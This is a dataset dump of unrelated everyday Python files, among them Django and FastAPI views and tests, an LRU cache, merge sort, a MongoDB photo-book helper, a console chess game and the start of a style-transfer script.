text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python3
#
# This is the output that I will get from my mycalendar1.py program.
#
Day Time Subject
Monday 9:10 AM - 10:15 AM LA
10:35 AM - 11:40 AM SS
12:10 PM - 1:15 PM S
Tuesday 9:10 AM - 10:15 AM Math
10:35 AM - 11:40 AM Orchestra
12:10 PM - 1:15 PM PF
# This is what it will show.
|
class Node:
    """Doubly-linked-list node holding one cache entry."""
    def __init__(self, key, value):
        self.key = key
        self.value = value
        self.prev = None
        self.next = None


class LRUCache:
    """Least-recently-used cache: dict for O(1) lookup plus a doubly linked
    list for O(1) recency ordering.

    `head` and `tail` are permanent sentinels; real entries live between
    them, least-recent right after `head`, most-recent just before `tail`.
    """
    def __init__(self, capacity: int):
        self.capacity = capacity
        self.hashmap = {}
        self.head = Node(0, 0)   # LRU-side sentinel
        self.tail = Node(0, 0)   # MRU-side sentinel
        self.head.next = self.tail
        self.tail.prev = self.head

    def get(self, key: int) -> int:
        """Return the cached value (refreshing its recency), or -1 if absent."""
        node = self.hashmap.get(key)
        if node is None:
            return -1
        self._remove(node)
        self._add(node)
        return node.value

    def put(self, key: int, value: int) -> None:
        """Insert or overwrite `key`; evict the least-recent entry on overflow."""
        if key in self.hashmap:
            self._remove(self.hashmap[key])
        fresh = Node(key, value)
        self._add(fresh)
        self.hashmap[key] = fresh
        if len(self.hashmap) > self.capacity:
            victim = self.head.next   # least recently used
            self._remove(victim)
            del self.hashmap[victim.key]

    def _remove(self, node):
        # Unlink `node` from wherever it sits in the list.
        node.prev.next = node.next
        node.next.prev = node.prev

    def _add(self, node):
        # Splice `node` in just before the tail sentinel (most-recent slot).
        last = self.tail.prev
        last.next = node
        node.prev = last
        node.next = self.tail
        self.tail.prev = node
|
from django.shortcuts import render
from .forms import ContactForm


def contact(request):
    """Render the contact page; on POST, validate the submitted form.

    `human` is True only when a POST passed validation (e.g. the captcha
    field checked by ContactForm).
    """
    human = False
    # Bug fix: the original tested `if request.POST:`, which is False for a
    # POST with an empty body, silently treating it as a GET. Checking the
    # request method is the documented Django pattern.
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            human = True
    else:
        form = ContactForm()
    return render(request, 'contact.html', {
        'form': form,
        'human': human,
    })
|
from django.urls import path, include
from . import views
from rest_framework import routers
import sys
# DRF router: auto-generates list/detail routes for the registered viewsets.
router = routers.DefaultRouter()
router.register('employer', views.EmployerView)
router.register('contacts', views.ContactsView)
urlpatterns = [
    # Mount the router at the app root: /employer/ and /contacts/ REST endpoints.
    path('', include(router.urls)),
    # Spreadsheet export view (presumably returns an .xls download — confirm in views).
    path(r'xls/', views.export_xls, name='export_xls'),
]
|
arr = [3, 5, 1, 7, 8, 12, 9, 2, 2, 0]


def mergesort(arr):
    """Sort *arr* in place using recursive merge sort.

    Bug fix: the base case is now ``n <= 1`` — the original ``n == 1`` let
    an empty list recurse on two empty halves forever (RecursionError).
    """
    n = len(arr)
    if n <= 1:
        return
    mid = n // 2
    left = arr[:mid]
    right = arr[mid:]
    mergesort(left)
    mergesort(right)
    # Merge the two sorted halves back into arr.
    l = m = p = 0
    nl, nr = len(left), len(right)
    while l < nl and m < nr:
        if left[l] <= right[m]:   # <= keeps the sort stable
            arr[p] = left[l]
            l += 1
        else:
            arr[p] = right[m]
            m += 1
        p += 1
    # Copy any leftovers (at most one of these loops runs).
    while l < nl:
        arr[p] = left[l]
        p += 1
        l += 1
    while m < nr:
        arr[p] = right[m]
        p += 1
        m += 1


mergesort(arr)
print(arr)
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.contrib import messages
class TestViews(TestCase):
    """Integration tests for the accounts views: registration, login,
    logout and profile.

    NOTE(review): the local variable `messages` in two tests shadows the
    module-level `django.contrib.messages` import — harmless here, but
    worth renaming.
    """
    def test_registration_new_user(self):
        # A valid registration should flash exactly one success message and
        # land on the index template.
        page = self.client.post('/accounts/registration/', {
            'username':'test_user',
            'email': 'test@test.com',
            'password1':'password',
            'password2':'password'
        },
        follow=True)
        messages = list(page.context['messages'])
        self.assertEqual(len(messages), 1)
        self.assertEqual(str(messages[0]), 'You have successfully registered with UPS')
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'index.html')
    def test_registration_when_user_is_already_authenticated(self):
        # An already-authenticated user is sent back to the index page.
        user = User.objects.create_user(username='test_user', email='test@test.com',password='password')
        self.client.login(username='test_user', password='password')
        page = self.client.get('/accounts/registration/', follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'index.html')
    def test_get_registration_form(self):
        # Anonymous GET renders the registration form.
        page = self.client.get('/accounts/registration/', follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'registration.html')
    def test_get_login_form(self):
        # Anonymous GET renders the login form.
        page = self.client.get('/accounts/login/', follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'login.html')
    def test_login_user(self):
        # Correct credentials log the user in and land on index.
        user = User.objects.create_user(username='test_user', password='password')
        page = self.client.post('/accounts/login/', {
            'username':'test_user',
            'password':'password',
        },
        follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'index.html')
    def test_login_user_when_already_logged_in(self):
        # Visiting the login page while authenticated redirects to index.
        user = User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        page = self.client.get('/accounts/login/', follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'index.html')
    def test_login_error(self):
        # A wrong password re-renders the login template.
        user = User.objects.create_user(username='test_user', password='password')
        page = self.client.post('/accounts/login/', {
            'username':'test_user',
            'password':'wrongpassword',
        },
        follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'login.html')
    def test_logout_user(self):
        # Logout flashes one confirmation message and returns to index.
        user = User.objects.create_user(username='test_user', password='password')
        login = self.client.login(username='test_user', password='password')
        self.assertTrue(login)
        page = self.client.get('/accounts/logout/', follow=True)
        messages = list(page.context['messages'])
        self.assertEqual(len(messages), 1)
        self.assertEqual(str(messages[0]), 'You have successfully been logged out')
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'index.html')
    def test_user_profile(self):
        # An authenticated user can view their profile page.
        user = User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        page = self.client.get('/accounts/profile/', follow=True)
        self.assertEqual(page.status_code, 200)
        self.assertTemplateUsed(page, 'profile.html')
    def test_edit_profile(self):
        # NOTE(review): this test posts but asserts nothing, and the URL lacks
        # a leading slash ('account/...' vs '/accounts/...') — confirm intent.
        user = User.objects.create_user(username='test_user', password='password')
        self.client.login(username='test_user', password='password')
        page = self.client.post('account/edit_profile/', {'first_name': 'testName', 'last_name':'test lastname', 'email': 'test@test.com', 'info':'testinfo' })
|
from seat.applications.TeacherApplication import TeacherApplication
from seat.applications.CourseApplication import CourseApplication
from seat.applications.ExamApplication import ExamApplication
from django.http import JsonResponse
from api.helpers import endpoint_checks
from django.core.urlresolvers import reverse
import logging
# Module-wide logger for every endpoint defined below.
logger = logging.getLogger('api')
# Application-service singletons shared by all endpoints in this module.
teacherApplication = TeacherApplication()
courseApplication = CourseApplication()
examApplication = ExamApplication()
# POST
def create_exam_success_json_model(exam_id):
    """JSON payload for a successful creation: new exam id + its edit URL."""
    return JsonResponse({
        'success' : True,
        'error' : False,
        'id' : str(exam_id),
        'edit_url': reverse('dashboard.views.exam_edit', args=[exam_id])
    })


def create_exam_failure_json_model(message):
    """JSON payload for a failed creation, carrying a human-readable message."""
    return JsonResponse({
        'success' : False,
        'error' : True,
        'message' : str(message)
    })


def create_exam_logic(teacher_query, request):
    """Create an exam named POST['name'] in course POST['course_id'].

    Returns the success payload on success, the generic failure payload on
    any error (logged).
    """
    try:
        course_id = request.POST['course_id']
        [new_exam, msg] = courseApplication.create_exam(teacher_query, course_id, request.POST['name'])
        return create_exam_success_json_model(new_exam.id)
    # Fix: `except Exception, error` is Python-2-only syntax; the `as` form
    # is valid on Python 2.6+ and 3.
    except Exception as error:
        logger.warning("problem creating exam! :" + str(error))
        return create_exam_failure_json_model('failed to create the exam, sorry. This is probably a db error.')


def create_exam(request):
    """POST endpoint: validate via the shared teacher-endpoint wrapper, then
    delegate to create_exam_logic."""
    return endpoint_checks.standard_teacher_endpoint(
        "create_exam",
        ['name', 'course_id'],
        'POST',
        request,
        create_exam_logic
    )
# DELETE
def delete_exam_success_json_model():
    """JSON payload for a successful deletion."""
    return JsonResponse({
        'success' : True,
        'error' : False,
    })


def delete_exam_failure_json_model(message):
    """JSON payload for a failed deletion, carrying a human-readable message."""
    return JsonResponse({
        'success' : False,
        'error' : True,
        'message' : str(message)
    })


def delete_exam_logic(teacher, request):
    """Delete the exam identified by DELETE['exam_id'].

    NOTE(review): `request.DELETE` is not a stock Django attribute —
    presumably added by endpoint_checks/middleware; confirm.
    """
    try:
        exam_id = request.DELETE['exam_id']
        examApplication.delete_exam(exam_id)
        return delete_exam_success_json_model()
    # Fix: Python-2-only `except Exception, error` -> portable `as` form.
    except Exception as error:
        logger.warning("problem deleting exam! :" + str(error))
        return delete_exam_failure_json_model('failed to delete the exam, sorry. This is probably a db error.')


def delete_exam(request):
    """DELETE endpoint: delegate to the shared teacher-endpoint wrapper."""
    return endpoint_checks.standard_teacher_endpoint(
        "delete_exam",
        ['exam_id'],
        'DELETE',
        request,
        delete_exam_logic
    )
# PUT
def update_exam_success_json_model():
    """JSON payload for a successful update."""
    return JsonResponse({
        'success' : True,
        'error' : False,
    })


def update_exam_failure_json_model(message):
    """JSON payload for a failed update, carrying a human-readable message."""
    return JsonResponse({
        'success' : False,
        'error' : True,
        'message' : str(message)
    })


def update_exam_logic(teacher, request):
    """Rename the exam PUT['exam_id'] to PUT['name'].

    NOTE(review): `request.PUT` is not a stock Django attribute — presumably
    added by endpoint_checks/middleware; confirm.
    """
    try:
        exam_id = request.PUT['exam_id']
        exam = examApplication.get_exam_by_id(exam_id)
        exam.name = request.PUT['name']
        exam.save()
        return update_exam_success_json_model()
    # Fix: Python-2-only `except Exception, error` -> portable `as` form.
    except Exception as error:
        logger.warning("problem updating exam! :" + str(error))
        return update_exam_failure_json_model('failed to update the exam, sorry. This is probably a db error.')


def update_exam(request):
    """PUT endpoint: delegate to the shared teacher-endpoint wrapper."""
    return endpoint_checks.standard_teacher_endpoint(
        "update_exam",
        ['exam_id', 'name'],
        'PUT',
        request,
        update_exam_logic
    )
# GET
def get_exam_success_json_model(exam):
    """JSON payload exposing the exam's name and id."""
    return JsonResponse({
        'success' : True,
        'error' : False,
        'exam' : {
            'name' : exam.name,
            'id' : exam.id
        }
    })


def get_exam_failure_json_model(message):
    """JSON payload for a failed fetch, carrying a human-readable message."""
    return JsonResponse({
        'success' : False,
        'error' : True,
        'message' : str(message)
    })


def get_exam_logic(teacher, request):
    """Fetch the exam identified by GET['exam_id'] and serialize it."""
    try:
        exam_id = request.GET['exam_id']
        exam = examApplication.get_exam_by_id(exam_id)
        return get_exam_success_json_model(exam)
    # Fix: Python-2-only `except Exception, error` -> portable `as` form.
    except Exception as error:
        logger.warning("problem getting exam! :" + str(error))
        return get_exam_failure_json_model('failed to get the exam, sorry. This is probably a db error.')


def get_exam(request):
    """GET endpoint: delegate to the shared teacher-endpoint wrapper."""
    return endpoint_checks.standard_teacher_endpoint(
        "get_exam",
        ['exam_id'],
        'GET',
        request,
        get_exam_logic
    )
|
#ATUL_KONAJE 5198
#CSE6331 ATUL.KONAJE@mavs.uta.edu
import pymongo
from pymongo import MongoClient
import hashlib
from bson.binary import Binary
from datetime import datetime
import base64
# Get a MongoDB client (default connection: localhost:27017).
mClient =MongoClient()
# Create / fetch the application's database.
mDB=mClient.Photobook_db
def enc_pwd(passwd):
    """Return the hex MD5 digest of *passwd* (accepts str or bytes).

    Generalization: str input is UTF-8 encoded so the function works on
    Python 3 as well as 2.

    SECURITY NOTE(review): unsalted MD5 is not an acceptable password hash —
    it is fast to brute-force. Replace with a real KDF (PBKDF2/bcrypt/scrypt).
    Left as-is here because existing stored hashes depend on it.
    """
    if isinstance(passwd, str):
        passwd = passwd.encode('utf-8')
    return hashlib.md5(passwd).hexdigest()
def create_user(uname,passwd,Gender):
    """Create a user record unless the username is already taken.

    Returns a human-readable status string in both cases.
    NOTE(review): the Gender parameter is accepted but never stored — confirm
    whether it should be written into the document.
    """
    user_coll=mDB.C_userdata
    # MD5 hex digest of the password (see enc_pwd and its security note).
    password=enc_pwd(passwd)
    user_exists=user_coll.find_one({"username":uname})
    if(user_exists):
        return "User with this name already exists"
    else:
        user_coll.insert_one({"username":uname,"pwd":password})
        return "User account created"
def authenticate_user(uname,passwd):
    """Return True iff a user named *uname* exists and the password matches.

    Fixes: the debug print of the password hash was removed (leaked secrets
    to stdout/logs); a missing user now returns False explicitly instead of
    the original implicit None; find_one replaces iterating the cursor and
    returning on the first document (same effective behavior).
    """
    user_coll = mDB.C_userdata
    password = enc_pwd(passwd)
    user = user_coll.find_one({"username": uname})
    if user is None:
        return False
    return user['pwd'] == password
#http://stackoverflow.com/questions/11915770/saving-picture-to-mongodb
def insertImage(image_data,username,img_UUID,comments,img_name):
    """Store *image_data* base64-encoded in C_images; True on success,
    False on any insert error."""
    encoded_string = base64.b64encode(image_data)
    try:
        img_ins=mDB.C_images.insert_one({"owner":username,"image":encoded_string,"image_UUID": str(img_UUID),"time":datetime.now(),"comments":comments,"imagename":img_name})
    # Fix: the original `print Exception` printed the exception *class*, not
    # the error that occurred; bind and print the actual exception instead.
    except Exception as exc:
        print(exc)
        return False
    # Fix: the original returned True only when img_ins was truthy and fell
    # off the end (implicit None) otherwise; insert_one always returns a
    # result object here, so report success explicitly.
    return bool(img_ins)
def retrieveUPimage(uuid,uname):
    """Fetch the base64 image stored for (*uuid*, *uname*) and return it as
    a decoded string ready for embedding."""
    record = mDB.C_images.find_one({"image_UUID": uuid, "owner": uname})
    decoded = record["image"].decode()
    return format(decoded)
def allmyimages(uname):
    """Return a cursor over every image owned by *uname*."""
    return mDB.C_images.find({"owner": uname})
def allimages():
    """Return a cursor over every stored image."""
    return mDB.C_images.find()
def saveComment(uname,comment,uid):
    """Append a comment to the image *uid*, keyed by a sortable timestamp.

    Fix: removed the Python-2-only debug statement `print uid`.
    """
    rec=mDB.C_images.find_one({"image_UUID":uid})
    # Timestamp with separators stripped so keys sort chronologically.
    cur_time=str(datetime.now()).replace("-","").replace(":","").replace(".","")
    rec['comments'][cur_time]={"user":uname,"user_comment":comment}
    # NOTE(review): Collection.save() is deprecated in modern PyMongo
    # (replace_one is the successor) — confirm the driver version in use.
    mDB.C_images.save(rec)
    return True
def retrieveComments(uuid):
    """Return {'uuid': ..., 'comment': [...]} with the image's comments in
    chronological (key) order.

    Fixes: `rec["comments"].keys()` followed by `.sort()` breaks on Python 3
    (dict views have no .sort()) — use sorted() instead; the two Python-2
    debug print statements were removed.
    """
    rec=mDB.C_images.find_one({"image_UUID":uuid})
    comm = {"comment": [], "uuid": uuid}
    for tim in sorted(rec["comments"]):
        comm["comment"].append(rec["comments"][tim])
    return comm
def delete_image(uuid):
    """Delete the image with the given UUID; returns a status string."""
    mDB.C_images.delete_one({"image_UUID":uuid})
    # Typo fix in the returned message: "Successfuly" -> "Successfully".
    return "Deleted Successfully"
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
""""
набор Pytest тестов для тестирования restfull версии приложения geo_map
"""
import pytest
from fastapi.testclient import TestClient
from app_fast_api import app
client = TestClient(app)
def test_read_root():
    # Root endpoint must answer 200 with the (Russian) service-description
    # string, compared byte-for-byte against the expected ("etalon") answer.
    response = client.get("/", headers={"X-Token": "coneofsilence"})
    assert response.status_code == 200
    answer = response.content.decode(response.encoding)
    etalon_answer = "\"Приложение для определения типа земельного участка по его GPS координатам и изображению генплана." \
                    " Конфигурация для города Казань \""
    assert answer == etalon_answer
def test_404_error():
    # An unknown route must return FastAPI's standard 404 JSON body.
    response = client.get("/abracadabra", headers={"X-Token": "coneofsilence"})
    assert response.status_code == 404
    answer = response.content.decode(response.encoding)
    etalon_answer = '{"detail":"Not Found"}'
    assert answer == etalon_answer
def test_read_status():
    # /status reports whether the model, transformers and map all loaded.
    # A fresh TestClient context manager is used (shadowing the module-level
    # one) so the app's startup events run and actually load the artifacts.
    with TestClient(app) as client:
        response = client.get("/status", headers={"X-Token": "coneofsilence"})
        assert response.status_code == 200
        answer = response.content.decode(response.encoding)
        etalon_answer = '" Model is loaded: True GPS transformer is loaded: True <br> Features transformer is loaded: True <br> Map is loaded: True"'
        assert answer == etalon_answer
def test_predict():
    # Two known GPS points must produce exact, pre-recorded predictions
    # (zone description, map coordinate, probability). The context-managed
    # client runs startup events so the model is loaded.
    with TestClient(app) as client:
        response = client.get("/predict/[55.80330934948255,%2049.33272207144011]", headers={"X-Token": "coneofsilence"})
        assert response.status_code == 200
        answer = response.content.decode(response.encoding)
        etalon_answer = '"[\\"PredictResultDescription(gps=\'[55.80330934948255, 49.33272207144011]\', coord=array([25250, 12114]), probability=1.0000129, description=\'Зона мест погребения\')\\"]"'
        assert answer == etalon_answer
        response = client.get("/predict/[55.79883508185922,%2049.105875912272566]", headers={"X-Token": "coneofsilence"})
        assert response.status_code == 200
        answer = response.content.decode(response.encoding)
        etalon_answer = '"[\\"PredictResultDescription(gps=\'[55.79883508185922, 49.105875912272566]\', coord=array([14404, 12460]), probability=1.0000265, description=\'Специализированная зона размещения объектов торговли, образования, здравоохранения, культуры, спорта\')\\"]"'
        assert answer == etalon_answer
|
from piece import *
from board import Board
from player import Player
"""
RUNS BY CYCLES
>Each cycle is when both White and Black make a move.
>Starts the game with a White move.
>Every move, checks if the game is finished, prints board, and
prints the last move of the game.
>For each move:
>1. Ask the position of the piece to move
>2. Shows all possible move for that piece
>3. Once the user chooses a move, his or her turn is over
>4. The same with the next player
"""
class Game():
    """Console chess game driver: main menu, turn loop, and user input
    validation.

    Relies on names from `from piece import *` (wki, bki, king, toSys,
    getPieceAtPosition, checkForPiece, all_black_pieces, all_white_pieces) —
    their exact contracts live in piece.py.
    """
    def __init__(self):
        # Multiline help text shown from the menu (option 2).
        self.howToPlay = """
        > This is the chess board, the black pieces are shown
        at the top and the white pieces, at the bottom.
        > Also, you have a legend of the pieces at the right
        > To play, the player on turn will have to choose the
        piece he or she wants to move by typing its cords.
        > The cords are given by a letter and a number that are
        both at the left and bottom of the board. Ex: G3
        > Then, the possible moves for the chosen piece will be
        displayed. They are shown by ( ) instead of [ ].
        > You only have to choose one of the shown cord the same
        way as before. Then it's the rival's turn
        > Now you guys are all good to start playing!
        >>> Press ENTER to go back to the main menu
        """
        # Main menu banner.
        self.menu = """
        ++++++++++++++++++++++++++++++++++++
        CHESS GAME
        1. Start Game
        2. How to Play
        3. Exit
        by Jem
        ++++++++++++++++++++++++++++++++++++
        Choose an option:"""
        self.board = Board() #creates the board for the game
        #get players names
        self.wPl = Player("w", wki) #white player
        self.bPl = Player("b", bki) #black player
    #--------------------------------------
    #displays menu and waits for the user's choice
    def displayMenu(self):
        print(self.menu) #display menu options
        while True:
            choice = input() #ask the user his or her choice from the main menu
            # Only accept a non-empty numeric choice; everything else reprompts.
            if choice != "" and choice.isnumeric():
                choice = int(choice)
                if choice == 1:
                    print("\n>>> GAME STARTED!\nGood luck, " + self.wPl.name + " and " + self.bPl.name + "!")
                    self.startGame(self.wPl, self.bPl) #starts the game
                elif choice == 2:
                    self.printHowToPlay()
                elif choice == 3:
                    print(">>> THANKS FOR PLAYING, COME BACK SOON!")
                    exit() #ends the program
                else:
                    print("Your choice must be a number between 1 and 3")
            else:
                print("Your choice must be a number [1-3]")
    #-------------------------------------------------
    #runs while the game is not over
    #parameter are the name of the players
    def startGame(self, wPl, bPl):
        lastTurn = "b" #to start the game with a white's turn
        while True: #set turn info
            # Alternate turns: whoever did NOT move last moves now.
            if lastTurn == "b":
                lastTurn = "w"
                currentPl = self.wPl #current player
            else:
                lastTurn = "b"
                currentPl = self.bPl #current player
            (self.board).print(None) #prints actual state of the board
            #check if game finish in tied
            if self.gameIsTied() != False:
                print(self.gameIsTied()) #print tie message
                exit() #end the program
            #if king is on check, player must protect it
            if (currentPl.king).isOnCheck():
                if (self.gameIsOver(currentPl) != False):
                    print(self.gameIsOver(currentPl)) #print end message
                    exit() #end program
                else:
                    print(currentPl.teamName + " KING IS ON CHECK, PROTECT IT")
                    #run protect king to take him out of the check position
                    (currentPl.king).protect()
            else:
                #if king is not on check, them rus a regular turn
                print(">>> " + currentPl.teamName + "'S TURN (" + currentPl.name + ")")
                self.runTurn(currentPl)
    #----------------------------------
    #runs a turn for the current player's team
    def runTurn(self, currentPl):
        piece = self.getPieceToMove(currentPl.team) #get piece to move
        to = self.getPositionTo(piece, currentPl.team, currentPl) #get the possito to move to
        # NOTE(review): the bare except silently swallows any failure from
        # moveTo (e.g. when getPositionTo returned None after a "0" restart).
        try:
            print(piece.moveTo(to[0], to[1])) #move the piece and prints a state
        except:
            pass
    #-----------------------------------
    #print how to play messages
    def printHowToPlay(self):
        print(">>> HOW TO PLAY\nThis is how the board looks like:") #header
        (self.board).print(None) #print board for example
        print(self.howToPlay) #display how to play message
        input() #wait to quit menu
        self.displayMenu() #go back to main menu
    #-------------------------------------------------
    #Ask the user to insert the position of the piece to move.
    #And checks that it is possible to move that piece.
    def getPieceToMove(self, team):
        while True:
            print("\nInsert the position of the piece to move:")
            piecePosition = input() #the only user interaction for this function
            #make sure input is not only one character or digit
            if len(piecePosition) == 0 or len(piecePosition) == 1:
                print("The input should be one letter and one digit, try again")
            else:
                if self.isValidPos(piecePosition):
                    if toSys(piecePosition, False):
                        #the position in this variable is ok
                        piecePosition = toSys(piecePosition, True)
                        #check that there are possible moves,
                        #otherwive, asks again for position
                        if self.validateForPiece(piecePosition, team):
                            #set piece position [x][y]
                            x = piecePosition[0]
                            y = piecePosition[1]
                            #return the specific piece
                            piece = getPieceAtPosition(x, y)
                            #get all possible moves to check if there are moves indeed
                            allPossibleMoves = piece.getMoves()
                            #if piece is a king, discard check moves
                            if piece.__class__ == king:
                                allPossibleMoves = piece.discardCheckMoves(allPossibleMoves)
                            if len(allPossibleMoves) == 0:
                                print("No possible moves for " + piece.name + ", try another one")
                            else:
                                #return the piece
                                return piece
                        else:
                            print("Empty spot, try another one")
                    else:
                        # NOTE(review): "Invaid" typo in the user message left as-is.
                        print("Invaid position, try another one")
                else:
                    print("Not a valid position, try another one.")
    #---------------------------------------------
    #Ask the user to choose one of the possible moves to the piece chose before
    def getPositionTo(self, piece, team, currentPl):
        #get all possible moves to check if there are moves indeed
        allPossibleMoves = piece.getMoves()
        #if piece is a king, discard check moves
        if piece.__class__ == king:
            allPossibleMoves = piece.discardCheckMoves(allPossibleMoves)
        (self.board).print(allPossibleMoves) #print board with possible moves
        piece.printPossibleMoves() #print the possible moves
        print('\nInsert "0" if you want to choose a different piece.')
        while True:
            positionTo = input() #the only user interaction for this function
            #make sure input is not only one character or digit
            if len(positionTo) == 0 or (positionTo != "0" and len(positionTo) == 1):
                print("The input should be one letter and one digit, try again")
            else:
                #if users wants to change piece, go back
                if positionTo == "0":
                    (self.board).print(None)
                    self.runTurn(currentPl) #run again to change piece
                    break
                if self.isValidPos(positionTo):
                    if toSys(positionTo, False):
                        positionTo = toSys(positionTo, True)
                        if [positionTo[0], positionTo[1]] in allPossibleMoves:
                            return positionTo #return item
                        else:
                            print("That move is not possible, check the list and try again")
                    else:
                        print("Invaid position, try another one")
                else:
                    print("Not a valid position, try another one.")
    #--------------------------------------------------------------
    #return true is the pos const of a letter and a number
    def isValidPos(self, pos):
        # Accepts exactly one digit + one non-digit, in either order.
        if pos[0].isnumeric() and not pos[1].isnumeric():
            return True
        elif not pos[0].isnumeric() and pos[1].isnumeric():
            return True
        return False
    #--------------------------------------------------------------
    #return True if the choosen piece to move is able to move
    #takes in consideration if there is a piece is that pos and
    #if the piece is the same team of the player in turn
    def validateForPiece(self, piecePosition, team):
        x = piecePosition[0]
        y = piecePosition[1]
        if not checkForPiece(x, y):
            return False
        else:
            if getPieceAtPosition(x, y).team != team:
                return False
        return True
    #-------------------------------
    #returns tie message is the game is a tie, False otherwise
    def gameIsTied(self):
        #if only the two kings are remainig, the game is a tie
        if (all_black_pieces == [bki]) and (all_white_pieces == [wki]):
            tieMessage = """
            +++++++++++++++++++++++++++++++++++++
            GAME OVER
            TIE BETWEEN BLACKS AND WHITES
            Congratulations, {pl1} and {pl2}!
            +++++++++++++++++++++++++++++++++++++
            """.format(pl1=self.wPl.name, pl2=self.bPl.name)
            return tieMessage
        return False
    #-----------------------------------------
    #return gameover message is game is over, false otherwise
    def gameIsOver(self, currentPl):
        #if there are no saving moves, its a check mate and game is over
        savingMoves = (currentPl.king).getSavingMoves()
        if len(savingMoves) == 0:
            # NOTE(review): "CHECK MAKE" typo in the banner left as-is.
            endMessage = """
            +++++++++++++++++++++++++++++++++++++
            GAME OVER
            {winnerTeam}'S ARE THE WINNERS
            CHECK MAKE ON {teamName}'S KING
            Congratulations!
            +++++++++++++++++++++++++++++++++++++
            """.format(winnerTeam=currentPl.opTeamName, teamName=currentPl.teamName)
            return endMessage
        return False
import sys
__all__ = ['apply_all_config', 'apply_config', 'get_config', 'load_module']
def apply_all_config(config_module):
    """Copy every public, non-callable attribute of *config_module* into the
    matching module-level config dict via apply_config()."""
    for key in dir(config_module):
        value = getattr(config_module, key, None)
        # Bug fix: the original compared type(...) to the *string* 'function',
        # which can never be equal, so callables were not actually skipped.
        if key[:2] == '__' or callable(value):
            continue
        apply_config(key, value)


def apply_config(key, config):
    """Merge the dict *config* into this module's dict attribute named *key*.

    Falsy configs and unknown keys are silently ignored; a *key* naming a
    dunder or a callable raises KeyError.
    """
    if not config:
        return
    md = sys.modules[__name__]
    base_config = getattr(md, key, None)
    if not base_config:
        return
    # Bug fix: `type(base_config) == 'function'` compared a type against a
    # string and was always False; use callable() to detect bad targets.
    # NOTE(review): the message reads "not invalid" — kept verbatim, but it
    # looks like it was meant to say "is invalid".
    if key[:2] == '__' or callable(base_config):
        raise KeyError('Config with key %s not invalid' % key)
    for k, it in config.items():
        base_config[k] = it
def get_config(key):
    """Return this module's attribute named *key*, or None when absent."""
    this_module = sys.modules[__name__]
    return getattr(this_module, key, None)
def load_module(caller, folder, name):
    """Import and return the module '<caller's package>.<folder>.<name>'.

    NOTE(review): the final __import__ argument (level=-1, implicit relative
    imports) is Python-2-only; Python 3 requires level=0 — confirm the
    intended runtime before porting.
    """
    # Drop the last component of the caller's dotted path to get its package.
    path = '.'.join(caller.split('.')[:-1]) if caller else ''
    path = '{0}.{1}.{2}'.format(path, folder, name)
    md = __import__(path, globals(), locals(), ['object'], -1)
    return md
# Default configuration dicts. apply_config()/apply_all_config() above merge
# user-supplied overrides into these in place.

# Core application settings.
APP = {
    'pool_size': 20
}
# Log file destination and verbosity level.
LOG = {
    'file': 'temp.log',
    'level': 'INFO'
}
# v1 handler configuration — empty by default, filled via apply_config().
V1_HANDLER = {
}
# v1 gather settings: presumably poll every `interval` seconds, looking
# `backwards_time` seconds back, via the named driver — confirm with driver.
V1_GATHER = {
    'interval': 60,
    'backwards_time': 30,
    'driver': 'cadgather_driver'
}
|
from django.shortcuts import render
# Create your views here.
def home(request):
    """Render the news app landing page."""
    return render(request,'newsApp/index.html')
def sportsnews(request):
    """Render the sports headlines page (shared news.html template)."""
    head_msg = 'Sports news'
    msg1 = 'No T20 world cup this year'
    msg2 = 'IPL postponed'
    # Typo fix in the displayed headline: "Paskitan" -> "Pakistan".
    msg3 = 'Pakistan players test positive for covid19'
    my_dict = {'head_msg': head_msg, 'msg1': msg1, 'msg2': msg2, 'msg3': msg3}
    return render(request, 'newsApp/news.html', context=my_dict)
def moviesnews(request):
    """Render the movies headlines page (shared news.html template)."""
    head_msg = 'Movies news'
    msg1 = 'SSRs death leave everyone shocked'
    # Typo fix in the displayed headline: "remanin" -> "remain".
    msg2 = 'Theatres to remain closed till 31st july'
    msg3 = 'Big releases on online streaming platform in july'
    my_dict = {'head_msg': head_msg, 'msg1': msg1, 'msg2': msg2, 'msg3': msg3}
    return render(request, 'newsApp/news.html', context=my_dict)
def politicsnews(request):
    """Render the politics headlines page (shared news.html template)."""
    # Typo fixes in displayed strings: "Poilitics" -> "Politics",
    # "yestarday" -> "yesterday", "Paskistan" -> "Pakistan".
    head_msg = 'Politics news'
    msg1 = 'Indo-China situation remains escalated'
    msg2 = 'Modi addressed the country yesterday at 4 P.M'
    msg3 = 'Pakistan deploy army near the borders'
    my_dict = {'head_msg': head_msg, 'msg1': msg1, 'msg2': msg2, 'msg3': msg3}
    return render(request, 'newsApp/news.html', context=my_dict)
|
# -*- coding: utf-8 -*-
import numpy as np
import tensorflow as tf
from vgg19_v26 import vgg19
import os
from PIL import Image
from PIL import ImageEnhance
import matplotlib.pyplot as plt
from tqdm import tqdm
# Working image dimensions (rows, cols, channels) used throughout.
img_H,img_W,img_C = 500, 800, 3
# Frozen VGG19 feature extractor; its weights are loaded from .npy files below.
vgg19net = vgg19(trainable=False)
# The only *trainable* variable is the generated image itself.
img = tf.get_variable(name='wanted', shape=(1,img_H,img_W,img_C))
# beta balances content vs. style loss; lr is the Adam learning rate.
beta_placeholder = tf.placeholder(shape=None, dtype=tf.float32)
lr_placeholder = tf.placeholder(shape=None, dtype=tf.float32)
# Build the network graph on top of the image variable.
# (1000 is presumably the classifier-head width — TODO confirm in vgg19_v26.)
vgg19net.inference(img, 1000)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def read_pretrained_weight():
    """Load the 32 frozen VGG19 weight arrays from ./weight/keras_<i>.npy
    into the network's variables."""
    for idx in tqdm(range(32)):
